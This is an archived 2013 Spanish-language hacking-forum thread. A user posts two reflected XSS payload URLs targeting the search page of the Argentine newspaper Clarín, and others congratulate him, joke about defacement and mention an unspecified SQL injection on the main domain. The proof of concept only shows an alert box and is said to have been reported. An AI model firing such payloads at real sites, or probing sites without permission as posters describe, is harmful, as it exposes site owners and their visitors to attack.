Sólo texto | Texto con Imágenes

Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: q3rv0 en Febrero 01, 2013, 12:07:04 AM

Título: XSS Reflected clarin.com (El diario mas polemico de la argentina)
Publicado por: q3rv0 en Febrero 01, 2013, 12:07:04 AM
(http://i.imgur.com/mg3butY.png)


Url del sitio: http://buscador.clarin.com/

Vectores:
- http://buscador.clarin.com/video?from=01/01/2013&to=01/02/2013"><script>alert(/XSS/)</script>
- http://buscador.clarin.com/video?from=01/01/2013"><script>alert(/XSS/)</script>&to=01/02/2013

Autor: [Q]3rV[0]

Reportado: SI
Título: Re:XSS Reflected clarin.com (El diario mas polemico de la argentina)
Publicado por: Cronos en Febrero 01, 2013, 12:12:52 AM
Hijo de su madre Clarin, el otro dia busque ahí y no encontré xD
Saludos,, Cronos.-
Título: Re:XSS Reflected clarin.com (El diario mas polemico de la argentina)
Publicado por: Expermicid en Febrero 01, 2013, 12:13:34 AM
xD muy bueno [Q]3rV[0].

Yo justo hoy mismo vi una propaganda en la TV y estuve por probar en clarin xD

Saludos
Título: Re:XSS Reflected clarin.com (El diario mas polemico de la argentina)
Publicado por: q3rv0 en Febrero 01, 2013, 12:16:38 AM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
xD muy bueno [Q]3rV[0].

Yo justo hoy mismo vi una propaganda en la TV y estuve por probar en clarin xD

Saludos

jaja a mi me pasa igual, que cuando veo una propaganda y pasan la web, enseguida me pongo a buscar algun fallo en esa web
Título: Re:XSS Reflected clarin.com (El diario mas polemico de la argentina)
Publicado por: Muppet en Febrero 01, 2013, 12:50:17 AM
jajaja muy bueno! te felicito!
Título: Re:XSS Reflected clarin.com (El diario mas polemico de la argentina)
Publicado por: CalebBucker en Febrero 01, 2013, 01:31:56 AM
También tiene SQL pero en el dominio principal.

Título: Re:XSS Reflected clarin.com (El diario mas polemico de la argentina)
Publicado por: Alex en Febrero 01, 2013, 12:35:00 PM
felicidades ahora eres partidario del gobierno, defaceando páginas de clarin jajajaj

saludos!
Título: Re:XSS Reflected clarin.com (El diario mas polemico de la argentina)
Publicado por: CalebBucker en Febrero 02, 2013, 02:50:31 PM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
felicidades ahora eres partidario del gobierno, defaceando páginas de clarin jajajaj

saludos!

XSS no es deface #LOL
Título: Re:XSS Reflected clarin.com (El diario mas polemico de la argentina)
Publicado por: Alex en Febrero 02, 2013, 03:01:40 PM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
felicidades ahora eres partidario del gobierno, defaceando páginas de clarin jajajaj

saludos!

XSS no es deface #LOL

es un decir, porque ilustrame como llamarías a la accion de realizar un xss en la pagina de clarin?

lo unico que se me ocurre es decirle

Citarfelicidades ahora eres partidario del gobierno, explotando vulnerabilidades en páginas de clarin jajajaj

cosa que en ese momento no se me ocurrió.

de todos modos cito la definición de wikipedia

CitarDefacement es una palabra inglesa que significa desfiguración y es un término usado en informática para hacer referencia a la deformación o cambio producido de manera intencionada en una página web por un atacante que haya obtenido algún tipo de acceso a ella, bien por algún error de programación de la página, por algún bug en el propio servidor o por una mala administración de este. El autor de un defacement se denomina defacer.

esta definición nos ilustra, comentandonos que defacement se le podría llamar a una deformación en el sitio web, originalmente la idea del programador de clarin no era que muestre ese mensaje, entonces es una deformación, por más que sea reflejado, sigue siendo una deformación por tanto según wikipedia un deface.

http://es.wikipedia.org/wiki/Defacement

saludos!
Sólo texto | Texto con Imágenes